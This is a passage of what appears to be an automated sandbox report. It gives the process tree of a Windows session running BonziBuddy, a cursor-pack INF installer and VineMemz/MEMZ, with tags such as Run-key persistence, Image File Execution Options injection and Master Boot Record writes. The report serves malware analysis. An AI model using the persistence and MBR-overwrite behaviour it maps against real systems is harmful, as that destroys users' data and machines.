  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,14397539398983253078,18307226776382463090,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=76 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8980 /prefetch:1
  2⤵
  PID:4772
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2068,14397539398983253078,18307226776382463090,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8960 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3164
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2068,14397539398983253078,18307226776382463090,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=8272 /prefetch:8
  2⤵
  PID:5844
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,14397539398983253078,18307226776382463090,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=79 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3996 /prefetch:1
  2⤵
  PID:1852
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,14397539398983253078,18307226776382463090,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=80 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8500 /prefetch:1
  2⤵
  PID:5568

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5148

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5240

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}
1⤵
- System Location Discovery: System Language Discovery
PID:5552

C:\Windows\System32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Windows\System32\shell32.dll,Control_RunDLL C:\Windows\System32\main.cpl
1⤵
- Modifies Control Panel
PID:4204

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1544

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap20828:94:7zEvent18617
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5316

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\Glib Cursors\Install.inf
1⤵
PID:1616

C:\Windows\System32\InfDefaultInstall.exe
"C:\Windows\System32\InfDefaultInstall.exe" "C:\Users\Admin\Downloads\Glib Cursors\Install.inf"
1⤵
- Adds Run key to start application
- Drops file in Windows directory
PID:5912
- C:\Windows\system32\runonce.exe
  "C:\Windows\system32\runonce.exe" -r
  2⤵
  - Checks processor information in registry
  PID:3396
- - C:\Windows\System32\grpconv.exe
    "C:\Windows\System32\grpconv.exe" -o
    3⤵
    PID:3992

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1416
- C:\Windows\system32\srtasks.exe
  C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5748
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 33620D8FFBFD9B2AF49C3A492155DF7E C
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:6364
- - C:\Program Files (x86)\Hit\Pingu\Pingu.exe
    "C:\Program Files (x86)\Hit\Pingu\Pingu.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    - Suspicious use of SetWindowsHookEx
    PID:6404

C:\Users\Admin\AppData\Local\Temp\Temp1_Bonzi.zip\BonziBuddy432.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_Bonzi.zip\BonziBuddy432.exe"
1⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2872
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\BonziBuddy432\Runtimes\CheckRuntimes.bat" "
  2⤵
  - System Location Discovery: System Language Discovery
  PID:840
- - C:\Program Files (x86)\BonziBuddy432\Runtimes\MSAGENT.EXE
    MSAGENT.EXE
    3⤵
    - Boot or Logon Autostart Execution: Active Setup
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:5868
  - - C:\Windows\SysWOW64\regsvr32.exe
      regsvr32 /s "C:\Windows\msagent\AgentCtl.dll"
      4⤵
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      Modifies registry class
      PID:3256
  - - C:\Windows\SysWOW64\regsvr32.exe
      regsvr32 /s "C:\Windows\msagent\AgentDPv.dll"
      4⤵
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:5180
  - - C:\Windows\SysWOW64\regsvr32.exe
      regsvr32 /s "C:\Windows\msagent\mslwvtts.dll"
      4⤵
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:3260
  - - C:\Windows\SysWOW64\regsvr32.exe
      regsvr32 /s "C:\Windows\msagent\AgentDP2.dll"
      4⤵
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:456
  - - C:\Windows\SysWOW64\regsvr32.exe
      regsvr32 /s "C:\Windows\msagent\AgentMPx.dll"
      4⤵
      Loads dropped DLL
      PID:5280
  - - C:\Windows\SysWOW64\regsvr32.exe
      regsvr32 /s "C:\Windows\msagent\AgentSR.dll"
      4⤵
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:5116
  - - C:\Windows\SysWOW64\regsvr32.exe
      regsvr32 /s "C:\Windows\msagent\AgentPsh.dll"
      4⤵
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:5352
  - - C:\Windows\msagent\AgentSvr.exe
      "C:\Windows\msagent\AgentSvr.exe" /regserver
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Modifies registry class
      Suspicious use of SetWindowsHookEx
      PID:1872
  - - C:\Windows\SysWOW64\grpconv.exe
      grpconv.exe -o
      4⤵
      System Location Discovery: System Language Discovery
      PID:4716
- - C:\Program Files (x86)\BonziBuddy432\Runtimes\tv_enua.exe
    tv_enua.exe
    3⤵
    - Boot or Logon Autostart Execution: Active Setup
    - Executes dropped EXE
    - Loads dropped DLL
    - Adds Run key to start application
    - Drops file in System32 directory
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:5840
  - - C:\Windows\SysWOW64\regsvr32.exe
      regsvr32 /s C:\Windows\lhsp\tv\tv_enua.dll
      4⤵
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:2936
  - - C:\Windows\SysWOW64\regsvr32.exe
      regsvr32 /s C:\Windows\lhsp\tv\tvenuax.dll
      4⤵
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:3624
  - - C:\Windows\SysWOW64\grpconv.exe
      grpconv.exe -o
      4⤵
      PID:2404

C:\Windows\system32\mspaint.exe
"C:\Windows\system32\mspaint.exe"
1⤵
- Sets desktop wallpaper using registry
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:4104

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService
1⤵
PID:968

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}
1⤵
- System Location Discovery: System Language Discovery
PID:548

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{5BD95610-9434-43C2-886C-57852CC8A120} -Embedding
1⤵
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
PID:5048
- C:\Windows\system32\systempropertiesadvanced.exe
  "C:\Windows\system32\systempropertiesadvanced.exe"
  2⤵
  - Modifies visibility of file extensions in Explorer
  - Modifies visiblity of hidden/system files in Explorer
  PID:3840

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
PID:992

C:\Program Files (x86)\BonziBuddy432\BonziBDY_4.EXE
"C:\Program Files (x86)\BonziBuddy432\BonziBDY_4.EXE"
1⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:6756

C:\Windows\msagent\AgentSvr.exe
C:\Windows\msagent\AgentSvr.exe -Embedding
1⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of SendNotifyMessage
PID:5164

C:\Program Files (x86)\BonziBuddy432\BonziBDY_2.EXE
"C:\Program Files (x86)\BonziBuddy432\BonziBDY_2.EXE"
1⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1160
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe shell32.dll,Control_RunDLL speech.cpl,,0
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2200
- - C:\Windows\system32\RunDll32.exe
    C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL speech.cpl,,0
    3⤵
    PID:632

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x304 0x318
1⤵
PID:5168

C:\Program Files (x86)\Hit\Pingu\Pingu.exe
"C:\Program Files (x86)\Hit\Pingu\Pingu.exe"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of SetWindowsHookEx
PID:4700

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe"
1⤵
PID:6276

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SendNotifyMessage
PID:6308

C:\Users\Admin\Desktop\VineMemz.exe
"C:\Users\Admin\Desktop\VineMemz.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5420
- C:\Users\Admin\AppData\Local\Temp\MEMZ.exe
  "C:\Users\Admin\AppData\Local\Temp\MEMZ.exe"
  2⤵
  - Event Triggered Execution: Image File Execution Options Injection
  - Checks computer location settings
  - Executes dropped EXE
  - Writes to the Master Boot Record (MBR)
  - Sets desktop wallpaper using registry
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of SetWindowsHookEx
  PID:5884
- - C:\Windows\SysWOW64\notepad.exe
    "C:\Windows\System32\notepad.exe" \note.txt
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4508
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=succ
    3⤵
    - Enumerates system info in registry
    PID:4648
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0x40,0x128,0x7ffa90c646f8,0x7ffa90c64708,0x7ffa90c64718
      4⤵
      PID:6620
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,3135500040387166501,9542867151691621440,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2224 /prefetch:2
      4⤵
      PID:4460
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2116,3135500040387166501,9542867151691621440,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2388 /prefetch:3
      4⤵
      PID:5640
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2116,3135500040387166501,9542867151691621440,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3004 /prefetch:8
      4⤵
      PID:4520
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,3135500040387166501,9542867151691621440,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.75 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3668 /prefetch:1
      4⤵
      PID:3288
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,3135500040387166501,9542867151691621440,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.75 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3680 /prefetch:1
      4⤵
      PID:6080
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,3135500040387166501,9542867151691621440,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.75 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4904 /prefetch:1
      4⤵
      PID:3892
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://ask.com/web?q=bad+ass+mafia+toolbar
    3⤵
    - Enumerates system info in registry
    PID:5608
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffa90c646f8,0x7ffa90c64708,0x7ffa90c64718
      4⤵
      PID:3344
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2180,14447950936877210523,8942430754036779449,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2204 /prefetch:2
      4⤵
      PID:6496
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2180,14447950936877210523,8942430754036779449,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2260 /prefetch:3
      4⤵
      PID:1016
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2180,14447950936877210523,8942430754036779449,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2736 /prefetch:8
      4⤵
      PID:5368
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,14447950936877210523,8942430754036779449,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.75 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1
      4⤵
      PID:4268
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,14447950936877210523,8942430754036779449,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.75 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1
      4⤵
      PID:3248
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,14447950936877210523,8942430754036779449,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.75 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4940 /prefetch:1
      4⤵
      PID:2696
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,14447950936877210523,8942430754036779449,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.75 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5088 /prefetch:1
      4⤵
      PID:6504
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,14447950936877210523,8942430754036779449,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.75 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5184 /prefetch:1
      4⤵
      PID:3496
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,14447950936877210523,8942430754036779449,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.75 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5164 /prefetch:1
      4⤵
      PID:516
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2180,14447950936877210523,8942430754036779449,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5712 /prefetch:8
      4⤵
      PID:1032
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2180,14447950936877210523,8942430754036779449,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5712 /prefetch:8
      4⤵
      PID:6116
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,14447950936877210523,8942430754036779449,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.75 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5776 /prefetch:1
      4⤵
      PID:4460
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,14447950936877210523,8942430754036779449,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1.75 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5968 /prefetch:1
      4⤵
      PID:216
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,14447950936877210523,8942430754036779449,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.75 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6188 /prefetch:1
      4⤵
      PID:3720
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,14447950936877210523,8942430754036779449,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.75 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6276 /prefetch:1
      4⤵
      PID:6480
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,14447950936877210523,8942430754036779449,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.75 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6296 /prefetch:1
      4⤵
      PID:4200
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,14447950936877210523,8942430754036779449,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1.75 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6448 /prefetch:1
      4⤵
      PID:2948
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,14447950936877210523,8942430754036779449,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1.75 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3976 /prefetch:1
      4⤵
      PID:3172
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=cat+desktop
    3⤵
    PID:7160
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffa90c646f8,0x7ffa90c64708,0x7ffa90c64718
      4⤵
      PID:6008
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://pcoptimizerpro.com/
    3⤵
    - Enumerates system info in registry
    PID:6512
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffa90c646f8,0x7ffa90c64708,0x7ffa90c64718
      4⤵
      PID:1544
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,4625585569742250004,3252513417868783451,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2128 /prefetch:2
      4⤵
      PID:5348
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2112,4625585569742250004,3252513417868783451,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2572 /prefetch:3
      4⤵
      PID:2020
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2112,4625585569742250004,3252513417868783451,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2852 /prefetch:8
      4⤵
      PID:4332
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
